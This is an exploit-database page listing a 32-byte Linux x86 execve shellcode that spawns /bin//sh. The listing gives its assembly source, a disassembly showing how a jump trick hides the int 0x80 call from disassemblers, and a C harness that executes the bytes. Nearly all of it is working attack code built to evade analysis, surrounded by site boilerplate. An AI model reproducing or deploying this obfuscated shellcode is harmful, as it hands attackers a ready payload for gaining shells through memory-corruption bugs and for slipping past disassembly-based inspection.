0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes

Author

BaCkSpAcE

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

============================================================
linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes
============================================================





/*  execve() shellcode with 'fuck up disasm' ability, 32 bytes long
    by BaCkSpAcE [sinisa86(at)gmail(dot)com]
    BitByterz Labs 2006
    http://www.bitbyterz.org

;
; shellcode.asm
;
  fupdisasm:
    db 0x68		; opcode for PUSH DW instruction
    db 0xcd		; crypt+1, opcode for INT instruction
    db 0x80		; interrupt number (80 in this case)
    db 0x68		; crypt+3
    db 0x68
    jmp fupdisasm+3
    db 0x68		; MAGIC_BYTE: this byte makes disasm go crazy

; our shellcode which we want to hide
    push byte 11
    pop eax
    xor edx, edx
    push edx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push edx
    push ebx
    mov ecx, esp
    jmp fupdisasm+1	; jumps on address where is hidden int 0x80


    backspace@bitbyterz# nasm shellcode.asm
    backspace@bitbyterz# ndisasm -u shellcode
    00000000  68CD806868        push dword 0x686880cd
    00000005  EBFC              jmp short 0x3
    00000007  686A0B5831        push dword 0x31580b6a
    0000000C  D25268            rcl byte [edx+0x68],cl
    0000000F  2F                das
    00000010  2F                das
    00000011  7368              jnc 0x7b
    00000013  682F62696E        push dword 0x6e69622f
    00000018  89E3              mov ebx,esp
    0000001A  52                push edx
    0000001B  53                push ebx
    0000001C  89E1              mov ecx,esp
    0000001E  EBE1              jmp short 0x1

    Find difference between original and dissasembled shellcode ;)
*/

#include <stdio.h>
#include <string.h>

char shellcode[] =      "\x68\xcd\x80\x68\x68\xeb\xfc\x68"
			"\x6a\x0b\x58\x31\xd2\x52\x68\x2f"
			"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
			"\x89\xe3\x52\x53\x89\xe1\xeb\xe1";

main() {
  void  (*fp) (void);
  fp = (void *) shellcode;
  printf ("%d bytes\n", strlen(shellcode));
  fp();
}



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes

Report Error

Report Error